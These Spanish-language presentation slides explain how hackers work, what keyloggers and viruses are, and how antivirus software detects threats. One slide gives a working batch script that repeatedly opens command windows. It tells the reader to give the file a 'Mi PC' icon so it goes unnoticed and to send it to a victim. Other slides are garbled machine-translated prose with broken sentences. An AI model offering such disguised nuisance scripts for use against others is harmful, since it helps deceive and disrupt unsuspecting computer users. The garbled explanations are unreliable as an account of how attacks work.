  • 20. Cómo descubrimos que estamos siendo atacados por un hacker Algunas de las formas de darse cuenta es cuando llegan muchos correos basura, o cuando llegan correos como del banco pidiendo contraseñas o peor cuando al revisar el ordenador se da uno cuenta que hay archivos corrompidos o que no estan y el computador tiene virus, que algunos no los detecta el antivirus.
  • 21. Como operan los hackers Los hackers principal recurso dependen, además de su propio ingenio, es un código informático. Si bien existe una gran comunidad de hackers en Internet, sólo un número relativamente pequeño de hackers en realidad el código del programa. Muchos hackers buscar y descargar el código escrito por otras personas. Hay miles de diferentes programas de los hackers utilizan para explorar las computadoras y redes. Estos programas dan a los piratas una gran cantidad de poder sobre los usuarios inocentes y las organizaciones - una vez un hacker experto sabe cómo funciona un sistema, se pueden diseñar programas que se aprovechan de ella.
  • 22. Programas Algunos de los programas que les facilitan son: Keyloggers:elprograma de registro de cada golpe de teclado, dando todo al hacker que tiene que infiltrarse en un sistema o incluso robar la identidad de alguien. virus: Los virus informáticos son programas diseñados para que se dupliquen y causar problemas que van desde estrellarse un equipo a exterminar a todo en el disco duro de un sistema
  • 23. Qué programa sirve para proteger las memorias usb de los virus Normalmente al llevar una usb tipo pendrive, lo que se supone es que si un equipo esta infectado, la usbtambien quede infectada, en la mayoria de los casos, por lo que antes de abrirla pasarle un antivirus, pues estos no son preventivos sino correctivos.
  • 24. Cómo se crea un virus 1. Abre el bloc de notas 2. Escribe el siguiente código: @echo off :a start start start start start start goto :a 3. Vete a archivo -> guardar como: Mi PC.bat , esto es el nombre del archivo, lo puedes llamar como quieras pero que termine en .bat. En tipo has de seleccionar todos los archivos 4. Puedes cambiar el icono por otro que te guste, por ejemplo por el de Mi PC, de esta manera pasará desapercibido. 5. Ya se lo puedes enviar a tu victima. Es un virus inofensivo, lo que hace el script, es abrir CMD seis veces continuamente y no tienes manera de detenerlo, simplemente reinicia el ordenador y el problema estará solucionado. Lo podemos considerar un truco del bloc de notas.
  • 25. Como se eliminan El software antivirus contrarresta de varias maneras los efectos de los virus informáticos para detectarlos. La mayoría de las soluciones se basan en tres componentes para la detección: exploración de acceso, exploración requerida, y suma de comprobación.